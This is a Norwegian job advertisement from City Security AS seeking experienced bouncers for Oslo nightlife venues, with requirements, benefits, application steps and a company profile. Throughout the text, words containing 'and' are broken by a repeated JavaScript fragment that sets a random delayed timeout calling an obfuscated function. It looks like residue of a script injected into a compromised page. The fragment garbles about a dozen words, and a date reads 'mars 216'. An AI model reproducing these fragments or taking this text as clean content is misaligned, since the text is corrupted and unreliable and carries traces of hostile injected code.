Om stillingen.

Vår avdeling for ordensvakt i Oslo søker dyktige ordensvakter til arbeid på utesteder i Oslo sentrum. Aktuelle kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidater vil tiltre stillingen i løpet av kort tid. Vi søker etter personer som interesserer seg for ordensvaktyrket. Du vil gjøre en god jobb som ordensvakt og kan tenke deg en karriere i City Security.
Vi trenger deg som har noen års erfaring fra yrket allerede, og som kan ta oppgavene som ordensvakt raskt. Du som aktuell kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat er både ansvarsbevisst og pliktoppfyllende. Du skal du være i standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and til å opptre profesjonelt og imøtekommende selv i en stressende situasjon. Det er en forutsetning at du er voksen i tankesettet, noe reflektert og har en god rolleforståelse. City Security representerer kunder utad og vi stiller derfor klare mål om rett dyktighet, god fremtreden og gode holdninger.

Vi ser for oss at du:
–    Har 3-5 års relevant erfaring eller mer fra ordensvaktyrket
–    23 år eller eldre, og jobber eller har tidligere jobbet i ordensvaktyrket
–    Vektkurs trinn 1-2-3, med kursbevis tilgjengelig.
–    Erfaring med arbeid på utested
–    Tilfredsstillende vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andel
–    Mulighet til å kunne arbeide helger, kvelder og netter

Den ideelle kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat:
–    Serviceinnstilt med ønske om å gjøre en god jobb.
–    Punktlig, ansvarsbevisst, engasjert, moden og reflektert i arbeidet
–    Ordnede forhold privat og profesjonelt

Kun kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidater med Vektkurs trinn 1-2-3 vil bli vurdert.

Søkere som ikke oppfyller kravene, vil ikke bli besvart.

Vi kan tilby:
–    Godt arbeidsmiljø i City Security
–    Mulighet til å jobbe ett eller flere utesteder, og på arrangementer osv
–    En konkurransedyktig lønn til en krevende ordensvakttjeneste
–    Gode muligheter til utvikling i et miljø med erfarne ordensvakter
–    Utfordringer og mestring
–    Gode rabatter på videre utdanning og gunstige priser på sikkerhetsutstyr hos samarbeidspartnere

Annet:
Det vil bli lagt stor vekt på personlig egnethet for yrket, modenhet og tidligere referanser. Vi forutsetter dessuten at alle våre fremtidige medarbeidere tar fullstendig avstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and fra all bruk av narkotika og dopingmidler. City Security henter inn uttømmende politiattest på kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidater som vurderes for ansettelse.

Slik søker du:
Vi besvarer kun søknader som oppfyller kravene. I en kort søknadstekst på to-tre avsnitt så ønsker vi at du fokuserer på minst to emner: tidligere erfaring (nåværende eller tidligere jobber), og din holdning som en ordensvakt. Ring oss gjerne for en kort samtale om stillingen.
Kort søknad med CV, og eventuelle referanser, sendes til avdelingsleder ordensvakt: jorn@citysecurity.no

Kvinner oppfordres til å søke!

Vi jobber med god vekterkultur i selskapet og søker flere kvinner for å få en balanse hos oss. Er du kvinne og ønsker en spennende jobb der du får gode kolleger. Send e-post til jorn@citysecurity.no for å få mer informasjon.

Kontaktperson:
Jørn Indseth – Avdelingsleder ordensvakt i City Security
Mobil: 95 28 25 68
E-post: jorn@citysecurity.no

Om City Security

City Security, ditt lokale vaktselskap i Oslo. City Security AS ble startet 1.januar 2011 med ordinære vektertjenester og arrangementsikkerhet som satsingsområde. I mars 216 startet vi arbeidet med Ordensvaktavdelingen for å også kunne tilby ordensvakter til utesteder i Oslo.

I dag har City Security – med vel over ca. 270 ansatte – vakthold for blant annet Høgskolen i Oslo og Akershus, Sporveien, Museene på Bygdøy og Oslo Spektrum, samt en rekke populære utesteder. City Security har ledere og ansatte som har lang og bred erfaring innen eventsikkerhet – vi jobber blant annet tett med Pro Sec som vi også deler lokaler med på Ryen i Oslo. I tillegg til rene vektertjenester kan vi også levere – med våre samarbeidspartnere – kurs, alarmmontering, sambandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and og en rekke andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andre tjenester.